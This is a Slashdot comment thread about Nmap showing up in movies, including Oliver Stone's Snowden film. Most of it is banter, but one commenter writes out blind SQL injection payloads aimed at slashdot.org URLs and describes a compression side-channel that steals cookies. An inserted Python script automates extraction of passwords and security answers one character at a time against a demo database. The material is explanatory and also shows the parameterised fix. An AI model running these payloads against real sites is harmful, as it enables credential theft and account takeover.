More Code In Movies: Nmap Meets Snowden (nmap.org)
After Saturday's story about the code samples in the new movie Arrival, an anonymous reader reminded us of this classic essay at Nmap.org:
For reasons unknown, Hollywood has decided that Nmap is the tool to show whenever hacking scenes are needed... While Nmap had been used in some previous obscure movies, it was The Matrix Reloaded which really turned Nmap into a movie star!
Nmap.org has a tradition -- the first person to notify them when new Nmap appears in a new movie wins a signed copy of Nmap Network Scanning "or a T-shirt of your choice from the Zero Day Clothing Nmap Store." (The site adds that "movie script writers, artists, and digital asset managers are also welcome to email Fyodor for advice.") And Nmap.org just added another film, Oliver Stone's new movie about Edward Snowden. In one early scene, Snowden is given a network security challenge at a CIA training class which is expected to take 5 to 8 hours. But with the help of Nmap and a custom Nmap NSE script named ptest.nse, Snowden stuns the professor by completing everything in 38 minutes!
According to the site, even the movie's trailer features Nmap. Anybody else have their own favorite stories about code in the movies?
but can nmap hack the gibson?
There was a space travel themed ride at (I think) Great America in Gurnee Illinois, and the line passed through what was supposed to be the mission control room. On one of the screens, they displayed scrolling C code, which appeared to be some sort of industrial/motor control software. I had a pleasant time in line doing a code review.
Someone could require to release the movies under the GPL
is the ridiculous portrayal of "hacking" and tech in general, along with the blatant disregard for law and constitution that often goes along with it. it's just cheap lazy ass film making.
*** 3d mazes and dragons and fire and shit? nope. not hardly.
*** "enhance!" (+ rinse and repeat) to blow up a single pixel of a reflection in a car's side mirror captured by a fuzzy analog security cam into a glorious full hd image.. nope. that's even worse
*** three clicks and 10 seconds to search all sorts of databases (government or private, with or without the fucked up 'hacking' graphics and such) the characters shouldn't have access to, certainly not always 'at the ready'... and probably not even with court orders.. nope. cross reference them and others and spit out the perfect suspect or target list. that's up there on the creepy and bad list too.
it's really nice to see some movie production teams put some effort into at least somewhat realistic (albeit boring as fuck) scenes and sequences.
>running nmap
>what is this computer shit
>ahh, it must be
>
>code!!1
"code"? who needs code when you already Know the Code.
The other reason for choosing LISP is that aliens would have a better chance of understanding it. Being based on the Lambda Calculus, it represents a fundamental understanding of the theory of computation. It is likely that other intelligent species would recognize it. It's unclear that C or C++ show that any intelligent life exists on earth.
Why is Snark Required?
Not raw code as such, but I like it whenever entertainment makes Visual Basic references...
https://www.youtube.com/watch?v=hkDD03yeLnU
In the movie Blackhat there's a screen where a hex editor is used to analyze some malware code. The hex code is just random nonsense, but the ASCII conversion contains lines from an erotic novel, with each word reversed
Here's a screenshot:
http://imgur.com/VIWNahL
The text on the right says
Her lover one day takes O for a walk ....
in a section of the city where they never go the Montsouris Park. After they have taken a stroll in the park, and have sat together side by side on the edge of a lawn, they notice at one corner of the park, at an intersection where there are never any taxis, a car which, because
--
which comes from this:
https://archive.org/stream/The... ... O_djvu.txt
---- The devil is in my pants! Look, look!
> ** Cracking a password one character at a time until all the characters are filled in. Nope, passwords are an all or nothing proposition.
Many attacks against passwords/keys are character-at-a-time. All types of padding oracle attacks are character-at-a-time, as are sql injection with results determined by the presence or absence of an error. (where password like 'a%'). Padding oracle attacks include POODLE and Lucky Thirteen.
> *** Hacking/coding as a real-time activity (e.g. furiously typing code to block another hacker in real-time)
I've done that, when I became aware of a breach due to what the attacker was doing at the moment, and I had only remote access so I couldn't pull the network cable.
Here's a specific example of hacking a password one character at a time, with details of how it's done.
Like most message boards, you can see my profile by going to:
slashdot.org/~raymorris
With many scripts, the profile url ends with ?userid=123
If you're a programmer, you know that's likely to be implemented with a line of code like this:
SELECT * FROM users WHERE userid='$input'
That ends up running:
SELECT * FROM users WHERE userid='raymorris'
Note that you get an error message if the username doesn't exist.
To hack someone's password, we use this URL:
slashdot.org/~raymorris'+AND+password+LIKE+'a%
Which runs this SQL:
SELECT * FROM users WHERE userid='raymorris' AND password LIKE 'a%'
As always, if that matches a user it will show their profile. If no user is found by the SQL, the page shows an error.
We try each character until we don't get an error. Suppose "J" shows the profile. We know the first character of the password is J. So we load up:
slashdot.org/~raymorris'+AND+password+LIKE+'Ja%
Voila, cracking passwords one character at a time. Works on many systems that have databases on the backend.
Suppose the coder is knowledgeable enough that they used salted hashes of the passwords. No problem, we just use:
slashdot.org/~raymorris'+AND+forgot_pwd_answer+LIKE+'a%
If the site has a "forgot your password?" feature where you answer a question like "what was your first pet's name?", the name of the pet is effectively an alternate password, and it's unlikely to be hashed.
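The LIKE 'prefix%' walk from the post above, as a runnable Python/sqlite3 example. This is an added illustration, not raymorris's code or Slashdot's; the profile page, the users table, the row for 'raymorris' and its plaintext password and pet name are all constructed for the demo. The vulnerable page glues the userid into the query string exactly as the post describes; the parameterised version beside it shows why the same payloads go nowhere against a properly written page.

```python
import sqlite3
import string

# Added example, not code from the post. Constructed sample data: one user
# whose password and "forgot password" answer are stored in the clear.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite's LIKE ignores ASCII case by default; turn that off so the demo
    # recovers the exact password rather than a case-folded version of it.
    conn.execute("PRAGMA case_sensitive_like = ON")
    conn.execute(
        "CREATE TABLE users (userid TEXT, password TEXT, forgot_pwd_answer TEXT)"
    )
    conn.execute("INSERT INTO users VALUES ('raymorris', 'Jabberwock7', 'fluffy')")
    conn.commit()
    return conn


def profile_vulnerable(conn: sqlite3.Connection, user_input: str) -> bool:
    """Hypothetical profile page built the way the post describes: the
    userid is pasted straight into the SQL. Returns True when a row comes
    back (profile shown) and False otherwise (error page). That one bit
    is the oracle."""
    sql = f"SELECT * FROM users WHERE userid='{user_input}'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def profile_safe(conn: sqlite3.Connection, user_input: str) -> bool:
    """Same page with a parameterised query: the input is bound as a value,
    so quotes and AND clauses in it are just characters of the userid."""
    row = conn.execute("SELECT * FROM users WHERE userid=?", (user_input,)).fetchone()
    return row is not None


def extract_column(oracle, userid: str, column: str,
                   alphabet: str = string.ascii_letters + string.digits,
                   max_len: int = 64) -> str:
    """Recover `column` for `userid` one character at a time through a
    true/false oracle: the LIKE 'prefix%' walk from the post."""
    known = ""
    for _ in range(max_len):
        for ch in alphabet:
            # Becomes: ... WHERE userid='raymorris' AND password LIKE 'Ja%'
            payload = f"{userid}' AND {column} LIKE '{known}{ch}%"
            if oracle(payload):
                known += ch
                break
        else:
            # No character extends the prefix: the whole value is recovered
            # (or it contains a character outside our alphabet).
            return known
    return known


if __name__ == "__main__":
    db = make_db()
    leaky = lambda payload: profile_vulnerable(db, payload)
    print("password:", extract_column(leaky, "raymorris", "password"))
    print("pet name:", extract_column(leaky, "raymorris", "forgot_pwd_answer"))
    fixed = lambda payload: profile_safe(db, payload)
    print("against the safe page:", repr(extract_column(fixed, "raymorris", "password")))
```

Each recovered character costs at most one request per alphabet symbol, which is why the post talks about seconds per character rather than a brute force over the whole password. The same extract_column call works against the forgot_pwd_answer column, which is the point about security questions being an unhashed second password.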
That scene was entertaining.
I think I was unclear. I'm NOT talking about brute force. I'm taking about finding the first character, then several seconds later cracking the second character, then several more seconds to get the third character, etc. Here's a step by step for one easy example, a boolean return SQLi:
https://slashdot.org/comments....
Padding oracle attacks are the same - you find the first character, then you find the second character, etc. Here's a rough description of one other similar example:
As is (or was) common for https traffic, the traffic is compressed with gzip and then encrypted. This string compresses well:
Cookie:abcabcabc
This one compresses poorly:
Cookie:abfkdgrkdgs
Assume the cookie is an access cookie for your bank. Seeing the encrypted traffic, I can't read it, but I can see how big it is. Using Javascript, I put an img tag on our web page for each of these URLs:
bank.com/Cookie:a
bank.com/Cookie:b
bank.com/Cookie:c
Your browser creates, compresses, and encrypts the following requests:
Get /Cookie:a
Cookie:bfjshdhd
Get /Cookie:b
Cookie:bfjshdhd
Get /Cookie:c
Cookie:bfjshdhd
Since they are encrypted I, as an attacker, can't read the requests to get your session cookie. However I can see how big the request is, after compression. You'll notice the second request contains the repeated string "Cookie:b". Since it's an exact repeat, it will compress better than the others, and I as an attacker now know the first character of your authentication cookie. My Javascript then repeats with:
Get /Cookie:ba
Cookie:bfjshdhd
Get /Cookie:bb
Cookie:bfjshdhd
Get /Cookie:bc ...
Cookie:bfjshdhd
Voila, I get your authentication cookie (effectively a password) one character at a time.
Yes, I do hack banks and other "secure" sites for a living.
Try reading the post before criticizing it and you might not make a complete fool out of yourself again. Try reading the last three sentences or so starting with "if the password is hashed".
I liked tron the best. Solar OS (Solaris?) running on sun4u hardware hey?
There were also a lot of parallels in the movie between the new ENRON owners and the new owners of Sun Microsystems (Oracle). Jumping Jack Flash was interesting too. Of course there are lots of others like Cloak and Dagger, War Games etc..
mame was in godzilla 2000
Its software.
We already have the Wilhelm scream that has appeared in countless movies as a kind of insider joke/cameo (including all Star Wars movies to date), so why not have the "Fyodor Code" as well?
UNIX? They're not even circumcised! Savages!
Someone cared.
In Visual Basic.
I knew I needed to stop reading Slashdot and finish my PhD when I started to miss articles by Bennett Haselton.
Ok, how's this for a scif{i,antasy} storyline- Snowden in 2012 or so stumbles upon secret CIA research into an atomic/photonic sized wormhole generation technique that can hack computers from the future or the past. Snowden discovers that Trump will beat Hillary in '16. Then funny stuff commences.
Seriously, can we redo all those Snowden debates from 2013 in the context of Trump being the next president, and after all the things said and done during the campaign? Do you really want to let them narrate away LOVINT now Snowden? Do we really want to lose the amount of sleep that will be lost knowing that Trump will have all the abilities that Snowden had in addition to the ability to start WW3?
Holy Shit people, grab onto your pussies, it's going to be a wild ride.
Not that I've seen, or even will bother to see the context of this, but this sounds a bit like what I would call 'sysadmin ingenuity'. I.e. sysadmins that are familiar with the unixy tools and recombining them for all sorts of improvised tasks can come up with speedy solutions like this that more traditional 'programmers' would miss. And in fact, this is basically why the premise of the summary seems bunk to me. nmap and ssh are the swiss army knives of getting anything serious done with computers involving security. And gpg and all the other obvious ones. For all the secrets Snowden revealed, we basically learned that the feds have no better advice than 'sftp' which we all knew already.
Showing a program operate almost certainly does not make that movie a derivative work...
The attack I just described gets the cookie, it doesn't require CSRF, and will get the cookie for most any site.
Note the URLs used are all 404, they don't exist. CSRF would be causing the browser to load a legitimate and important URL like change-password.php?newpass=hacked
I hope this movie has drawing on windows.
Can't stand to see a movie with a science/maths/programming bent that doesn't have drawing on windows.
What was Nmap paid for its stellar performance in these movies? (The GPL seems to have overlooked movie appearances)